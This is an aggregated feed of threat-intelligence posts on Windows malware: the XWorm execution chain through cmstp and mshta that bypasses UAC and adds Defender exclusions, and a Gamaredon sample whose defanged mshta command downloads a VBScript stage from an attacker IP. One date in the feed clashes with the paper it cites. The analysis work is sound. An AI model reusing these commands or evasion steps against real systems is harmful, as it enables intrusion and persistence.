ClickFix: How to Infect Your PC in Three Easy Steps
https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/
#U.S.DepartmentofHealthandHumanServices #MicrosoftWindows #MicrosoftOffice #GoogleChrome #booking.com #ArcticWolf #proofpoint #mshta.exe #ClickFix #Facebook #Other
🚨 #XWorm leverages LOLBAS techniques to abuse #CMSTPLUA
CMSTPLUA is a legitimate Windows tool that can be exploited for system binary proxy execution using #LOLBAS techniques, bypassing security controls like #UAC, and executing #malicious code, putting organizations at risk.
⚙️ With Script Tracer in #ANYRUN Sandbox, a SOC team can analyze scripts more efficiently. It simplifies script breakdowns, making it easier to understand their behavior and get key insights.
The #script embedded in the INF file is used to coordinate an execution chain:
1️⃣ EXE starts cmstp.exe which is used to launch a #malicious script from an #INF file.
2️⃣ CMSTPLUA ➡️ mshta.exe ➡️ cmd.exe ➡️ EXE ➡️ PowerShell
– #MSHTA loads a #VBScript from memory to run an executable and shuts down the #CMSTP process.
– EXE launches #PowerShell to add itself to #MicrosoftDefender exceptions.
3️⃣ Finally, it runs the XWorm #payload from the #System32 directory and adds itself to the Scheduled Task for persistence.
👨💻 Check out the analysis and see Script Tracer in action:
https://app.any.run/tasks/9352d612-8eaa-4fac-8980-9bee27b96bce/?utm_source=mastodon&utm_medium=post&utm_campaign=cmstplua&utm_term=130225&utm_content=linktoservice
Living-off-the-Land techniques have been leveraged for years to execute malicious operations using legitimate system utilities.
Use these TI Lookup search queries to find similar samples and improve the efficiency of your organization's security response:
🔍 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=cmstplua&utm_content=linktoti&utm_term=130225#%7B%2522query%2522:%2522commandLine:%255C%2522%255C%255C.inf%255C%2522%2520AND%2520imagePath:%255C%2522cmstp%255C%255C.exe$%255C%2522%2522,%2522dateRange%2522:180%7D
🔍 https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=cmstplua&utm_content=linktoti&utm_term=130225#%7B%2522query%2522:%2522commandLine:%255C%2522mshta%2520vbscript:%255C%2522%2522,%2522dateRange%2522:180%7D
Analyze latest #malware and #phishing threats with #ANYRUN 🚀
網路捷徑檔案安全機制繞過漏洞遭到利用超過一年,攻擊者用於散布數種竊資軟體 | iThome
Link📌 Summary:A very fresh #Gamaredon TA sample from today (Jan 23, 2022) targeting the Directorate General For Rendering Services To Diplomatic Missions of #Ukraine:
Original email: afb612d08112c036628a29ed8d4bd4550ca7cfed2582e2f432f2283a9b507f15
Attachment:
d124919de870b5974639ba24dd80709ed890119bdec4ba6a6179464fca4ef952 *Запит.tar
Extracted malicious LNK:
600ef7861ad03b434d98312a4133dc33fa1944f43c2e558044dfcdb342803147 *Відповідно_до_статті_20_Закону,_просимо_надати_відповідь_протягом_5_робочих_днів_з_дня_отримання_запиту.lnk
dropping a next stage #vbscript via #mshta
%windir%\system32\mshta[.]exe http://194.180.174[.]203/23.01/mo/baseball[.]DjVu
284bd873c840415ee24738f0a866b558d51f5f58b6bf29fb2818ffb819f9bd04 *baseball.DjVu
Once deobfuscated it leads to a #Telegram channel providing with the next state IP:
b7422446c22baee16c6c9c00a82610f739b836648ffce070bbd6c932db5416f5 *baseball.DjVu.deobfuscated
We have a full paper of this Telegram multi-staging technique published last week here: https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations
The Gamaredon Group has been actively targeting the Ukrainian government lately, relying on the infrastructure of the popular messaging service Telegram to bypass traditional network traffic detection techniques without raising obvious flags. This new report from BlackBerry provides an analysis.
KrebsOnSecurity RSS
ITSEC News
ANY.RUN
卡拉今天看了什麼
Dmitry Bestuzhev